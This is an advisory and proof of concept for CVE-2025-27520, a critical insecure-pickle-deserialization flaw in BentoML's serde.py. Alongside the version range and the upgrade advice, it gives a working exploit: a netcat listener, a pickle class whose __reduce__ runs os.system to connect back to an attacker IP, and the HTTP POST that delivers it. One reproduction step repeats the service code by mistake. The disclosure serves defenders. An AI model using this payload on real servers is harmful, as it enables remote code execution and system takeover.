Vulnerability Identification
- CVE Reference: CVE-2025-27520
- CVSS Score: 9.8 (Critical)
- Impact: Remote Code Execution (RCE) compromising integrity, confidentiality, and availability
- Affected Library: BentoML, a Python library for deploying optimized online serving systems for AI applications and model inference
Technical Details
- Root Cause: Insecure deserialization in BentoML
- Vulnerable Code File: serde.py, where HTTP request payloads can be manipulated
- Vulnerable Code Snippet:
Pyton
def deserialize_value(self, payload: Payload) -> t.Any:
if "buffer-lengths" not in payload.metadata:
return pickle.loads(b"".join(payload.data)) # Unsafe deserialization
Data flow analysis confirms payload content comes from HTTP requests that attackers can fully manipulate. The lack of proper validation allows malicious serialized data to execute harmful actions during deserialization.
Affected Versions
- Vulnerable Versions: 1.3.4 through 1.4.2
Risks
- Complete system compromise: Attackers can gain full control
- Data theft: Sensitive data exfiltration
- Denial of Service (DoS): Systems can be rendered unusable
- Malware installation: Malicious software can be deployed
Recommendations
- Urgent Update: Immediately upgrade to BentoML version 1.4.3
Proof of Concept (PoC)
Test Environment
- Target Server:
- IP: 10.98.36.123
- OS: Ubuntu
- Attacker Machine:
- IP: 10.98.36.121
- OS: Ubuntu
Reproduction Steps
- Install BentoML on server:
Batch
pip install -U bentoml
2. Deploy vulnerable service:
Pyton
# service.py
import bentoml
@bentoml.service(resources={"cpu": "4"})
class Summarization:
def __init__(self):
import torch
from transformers import pipeline
device = "cuda" if torch.cuda.is_available() else "cpu"
self.pipeline = pipeline('summarization', device=device)
@bentoml.api(batchable=True)
def summarize(self, texts: list[str]) -> list[str]:
results = self.pipeline(texts)
return [item['summary_text'] for item in results]
3. Run service:
Batch
# service.py
import bentoml
@bentoml.service(resources={"cpu": "4"})
class Summarization:
def __init__(self):
import torch
from transformers import pipeline
device = "cuda" if torch.cuda.is_available() else "cpu"
self.pipeline = pipeline('summarization', device=device)
@bentoml.api(batchable=True)
def summarize(self, texts: list[str]) -> list[str]:
results = self.pipeline(texts)
return [item['summary_text'] for item in results]
4. Attacker listens for connection:
Batch
nc -lvvp 1234
5. Attacker sends malicious payload:
Pyton
import pickle, os, requests
headers = {'Content-Type': 'application/vnd.bentoml+pickle'}
class Evil:
def __reduce__(self):
return (os.system, ('nc 10.98.36.121 1234',))
payload = pickle.dumps(Evil())
requests.post("http://10.98.36.123:3000/summarize", data=payload, headers=headers)
6. Result:
The server (10.98.36.123) initiates a connection to the attacker (10.98.36.121) on port 1234, confirming successful RCE.
